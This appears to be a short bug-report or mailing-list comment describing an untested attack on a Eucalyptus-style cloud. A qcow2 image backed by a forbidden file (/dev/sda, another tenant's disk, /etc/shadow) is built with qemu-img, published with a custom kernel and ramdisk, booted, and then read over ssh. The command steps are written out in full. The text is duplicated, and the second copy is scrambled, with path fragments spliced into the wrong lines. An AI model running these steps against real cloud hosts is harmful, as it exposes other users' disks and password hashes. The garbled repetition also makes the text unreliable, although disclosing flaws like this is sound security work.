OK. So I'm almost 100% certain that this is a valid attack at this point, but still have not tested. See if you can tell me why the following *wouldn't* work.
Below:
* FILE is a path to something that you should not be able to read. '/dev/sda' or '/path/to/another/instances/i-0000002/disk' or possibly /etc/shadow.
* $KERNEL is probably a normal kernel possibly a distro built one
* $RAMDISK is a fully functional OS in a ramdisk (with an ssh server to reach it), but you probably don't even need this if you have vnc console access (to interactively 'fix' possibly failed initramfs boot).
* FILE=/dev/sda (or /path/to/likely/other/users/instance/disk)
So, to attack:
* qemu-img create -f qcow2 -b $FILE my-attack.img
* cloud-publish-image --kernel-file $KERNEL --ramdisk-file $RAMDISK x86_64 $FILE my-attack-bucket
* euca-run-instances ami-abcdefg
* ssh to new (initramfs based rootfs), and start reading from $FILE
OK. So I'm almost 100% certain that this is a valid attack at this point, but still have not tested. See if you can tell me why the following *wouldn't* work. to/another/ instances/ i-0000002/ disk' or possibly /etc/shadow. likely/ other/users/ instance/ disk)
Below:
* FILE is a path to something that you should not be able to read. '/dev/sda' or '/path/
* $KERNEL is probably a normal kernel possibly a distro built one
* $RAMDISK is a fully functional OS in a ramdisk (with an ssh server to reach it), but you probably don't even need this if you have vnc console access (to interactively 'fix' possibly failed initramfs boot).
* FILE=/dev/sda (or /path/to/
So, to attack:
* qemu-img create -f qcow2 -b $FILE my-attack.img
* cloud-publish-image --kernel-file $KERNEL --ramdisk-file $RAMDISK x86_64 $FILE my-attack-bucket
* euca-run-instances ami-abcdefg
* ssh to new (initramfs based rootfs), and start reading from $FILE